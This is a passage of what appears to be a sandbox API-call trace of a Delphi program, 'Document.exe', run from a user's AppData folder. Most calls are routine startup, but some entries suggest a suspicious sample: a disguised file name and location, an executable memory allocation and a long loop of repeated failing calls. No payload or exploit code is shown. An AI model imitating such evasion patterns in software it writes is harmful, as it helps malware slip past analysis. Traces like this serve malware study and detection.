Locale=0x409, LCType=0x36, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Sat") returned 4 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd78, cchData=256 | out: lpLCData="Saturday") returned 9 [0192.484] GetThreadLocale () returned 0x409 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="$") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fecc, cchData=2 | out: lpLCData=".") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="2") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fecc, cchData=2 | out: lpLCData="/") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0192.484] GetThreadLocale () returned 0x409 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0192.484] GetThreadLocale () returned 0x409 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fda0, cchData=256 | out: lpLCData="1") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fecc, cchData=2 | out: lpLCData=":") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="AM") returned 3 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="PM") returned 3 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd4, cchData=256 | out: lpLCData="0") returned 2 [0192.484] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fecc, cchData=2 | out: lpLCData=",") returned 2 [0192.484] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76720000 [0192.484] GetProcAddress (hModule=0x76720000, lpProcName="VariantChangeTypeEx") returned 0x76724c28 [0192.484] GetProcAddress (hModule=0x76720000, lpProcName="VarNeg") returned 0x7679c802 [0192.484] GetProcAddress (hModule=0x76720000, lpProcName="VarNot") returned 0x7679ec66 [0192.484] GetProcAddress (hModule=0x76720000, lpProcName="VarAdd") returned 0x76745934 [0192.484] GetProcAddress (hModule=0x76720000, lpProcName="VarSub") returned 0x7679d332 [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarMul") returned 0x7679dbd4 [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarDiv") returned 0x7679e405 [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarIdiv") returned 0x7679f00a [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarMod") returned 0x7679f15e [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarAnd") returned 0x76745a98 [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarOr") returned 0x7679ecfa [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarXor") returned 0x7679ee2e [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarCmp") returned 0x7673b0dc [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarI4FromStr") returned 0x76736fab [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarR4FromStr") returned 0x767401a0 [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarR8FromStr") returned 0x7673699e [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarDateFromStr") returned 0x76746ba7 [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarCyFromStr") returned 0x76766c12 [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarBoolFromStr") returned 0x7673dbd1 [0192.485] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromCy") returned 0x76747fdc [0192.486] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromDate") returned 0x76737a2a [0192.486] GetProcAddress (hModule=0x76720000, lpProcName="VarBstrFromBool") returned 0x76740355 [0192.486] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8 [0192.486] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xac [0192.486] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xb0 [0192.487] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x77820000 [0192.487] GetDC (hWnd=0x0) returned 0xffffffffb80109e1 [0192.526] GetDeviceCaps (hdc=0xb80109e1, index=90) returned 96 [0192.526] ReleaseDC (hWnd=0x0, hDC=0xb80109e1) returned 1 [0192.526] GetDC (hWnd=0x0) returned 0x4d01099b [0192.526] GetDeviceCaps (hdc=0x4d01099b, index=104) returned 0 [0192.527] ReleaseDC (hWnd=0x0, hDC=0x4d01099b) returned 1 [0192.527] CreatePalette (plpal=0x18fb30) returned 0x5b0807c5 [0192.527] GetStockObject (i=7) returned 0x1b00017 [0192.527] GetStockObject (i=5) returned 0x1900015 [0192.527] GetStockObject (i=13) returned 0x18a002e [0192.527] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0192.527] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0192.527] LoadStringA (in: hInstance=0x400000, uID=0xff34, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0192.527] LoadStringA (in: hInstance=0x400000, uID=0xff33, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0192.527] LoadStringA (in: hInstance=0x400000, uID=0xff32, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0192.527] LoadStringA (in: hInstance=0x400000, uID=0xff31, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0192.527] LoadStringA (in: hInstance=0x400000, uID=0xff30, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0192.527] LoadStringA (in: hInstance=0x400000, uID=0xff4f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0192.527] LoadStringA (in: hInstance=0x400000, uID=0xff4e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0192.527] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0192.527] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0192.528] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0192.528] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0192.528] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0192.528] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0192.528] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0192.528] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0192.528] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0192.528] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0192.528] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0192.529] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0e7 [0192.529] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0f8 [0192.529] GetCurrentThreadId () returned 0x6c8 [0192.529] GlobalAddAtomA (lpString="WndProcPtr00400000000006C8") returned 0xc120 [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xfef3, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xfef2, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xfef1, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xfef0, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xff0f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xff0e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xff0d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xff0c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xff0a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xff09, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0192.529] LoadStringA (in: hInstance=0x400000, uID=0xff07, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0192.530] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0192.531] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0192.531] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0192.531] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0192.531] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0192.531] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0192.531] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x18fb2c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0192.531] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1e8 [0192.531] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc1e9 [0192.531] GetVersion () returned 0x1db10106 [0192.531] GetCurrentProcessId () returned 0xa68 [0192.531] GlobalAddAtomA (lpString="Delphi00000A68") returned 0xc11f [0192.531] GetCurrentThreadId () returned 0x6c8 [0192.531] GlobalAddAtomA (lpString="ControlOfs00400000000006C8") returned 0xc11e [0192.531] RegisterClipboardFormatA (lpszFormat="ControlOfs00400000000006C8") returned 0xc1c1 [0192.532] GetProcAddress (hModule=0x77820000, lpProcName="GetMonitorInfoA") returned 0x77844413 [0192.532] GetProcAddress (hModule=0x77820000, lpProcName="GetSystemMetrics") returned 0x77837d2f [0192.532] GetSystemMetrics (nIndex=19) returned 1 [0192.587] GetSystemMetrics (nIndex=75) returned 1 [0192.587] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1da1320, fWinIni=0x0 | out: pvParam=0x1da1320) returned 1 [0192.588] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0192.588] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0192.588] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0xf02b7 [0192.588] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0192.588] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0192.588] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0192.588] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x4028d [0192.588] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x70287 [0192.589] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x3b0271 [0192.589] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x150265 [0192.589] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x100261 [0192.589] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0xd0187 [0192.590] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0192.590] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0192.590] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0192.590] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0192.590] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0192.590] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0192.590] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0192.590] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0192.590] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0192.590] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0192.590] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0192.590] GetDC (hWnd=0x0) returned 0x4d01099b [0192.590] GetDeviceCaps (hdc=0x4d01099b, index=90) returned 96 [0192.590] ReleaseDC (hWnd=0x0, hDC=0x4d01099b) returned 1 [0192.590] GetProcAddress (hModule=0x77820000, lpProcName="EnumDisplayMonitors") returned 0x7784451a [0192.590] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4564bc, dwData=0x1da156c) returned 1 [0192.591] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fe97, fWinIni=0x0 | out: pvParam=0x18fe97) returned 1 [0192.591] CreateFontIndirectA (lplf=0x18fe97) returned 0x180a07a4 [0192.591] GetObjectA (in: h=0x180a07a4, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0192.591] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fd43, fWinIni=0x0 | out: pvParam=0x18fd43) returned 1 [0192.591] CreateFontIndirectA (lplf=0x18fe1f) returned 0x4b0a078e [0192.591] GetObjectA (in: h=0x4b0a078e, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0192.591] CreateFontIndirectA (lplf=0x18fde3) returned 0x360a06f4 [0192.591] GetObjectA (in: h=0x360a06f4, c=60, pv=0x18fc88 | out: pv=0x18fc88) returned 60 [0192.592] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x120109 [0192.595] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fdf7, nSize=0x100 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.595] OemToCharA (in: pSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", pDst=0x18fdf7 | out: pDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe") returned 1 [0192.595] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x210000 [0192.596] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fdac | out: lpWndClass=0x18fdac) returned 0 [0192.596] RegisterClassA (lpWndClass=0x45fe1c) returned 0xc5c1c4 [0192.596] GetSystemMetrics (nIndex=0) returned 1440 [0192.596] GetSystemMetrics (nIndex=1) returned 900 [0192.596] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="Document", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x40220 [0192.602] SetWindowLongA (hWnd=0x40220, nIndex=-4, dwNewLong=2166767) returned 4219680 [0192.602] SendMessageA (hWnd=0x40220, Msg=0x80, wParam=0x1, lParam=0x120109) returned 0x0 [0192.602] NtdllDefWindowProc_A (hWnd=0x40220, Msg=0x80, wParam=0x1, lParam=0x120109) returned 0x0 [0192.615] NtdllDefWindowProc_A (hWnd=0x40220, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x1f02c5 [0192.616] SetClassLongA (hWnd=0x40220, nIndex=-14, dwNewLong=1179913) returned 0x0 [0192.616] GetSystemMenu (hWnd=0x40220, bRevert=0) returned 0x800cf [0192.618] DeleteMenu (hMenu=0x800cf, uPosition=0xf030, uFlags=0x0) returned 1 [0192.618] DeleteMenu (hMenu=0x800cf, uPosition=0xf000, uFlags=0x0) returned 1 [0192.618] DeleteMenu (hMenu=0x800cf, uPosition=0xf010, uFlags=0x0) returned 1 [0192.619] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fd78 | out: lpList=0x18fd78) returned 1 [0192.620] GetModuleHandleA (lpModuleName="USER32") returned 0x77820000 [0192.620] GetProcAddress (hModule=0x77820000, lpProcName="AnimateWindow") returned 0x7784b531 [0192.621] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75460000 [0192.621] GetProcAddress (hModule=0x75460000, lpProcName="InitializeFlatSB") returned 0x7549266f [0192.621] GetProcAddress (hModule=0x75460000, lpProcName="UninitializeFlatSB") returned 0x75492542 [0192.621] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollProp") returned 0x75491d29 [0192.621] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollProp") returned 0x7549238d [0192.621] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_EnableScrollBar") returned 0x754920c9 [0192.622] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_ShowScrollBar") returned 0x75491fdb [0192.622] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollRange") returned 0x75491e8d [0192.622] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollInfo") returned 0x75491f0f [0192.622] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_GetScrollPos") returned 0x75491ccd [0192.622] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollPos") returned 0x7549216d [0192.622] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollInfo") returned 0x754922be [0192.622] GetProcAddress (hModule=0x75460000, lpProcName="FlatSB_SetScrollRange") returned 0x754921e2 [0192.622] GetModuleHandleA (lpModuleName="User32.dll") returned 0x77820000 [0192.622] GetProcAddress (hModule=0x77820000, lpProcName="SetLayeredWindowAttributes") returned 0x7785ec88 [0192.622] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0bf [0192.622] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fe2c, nSize=0xff | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] GetLastError () returned 0x6 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 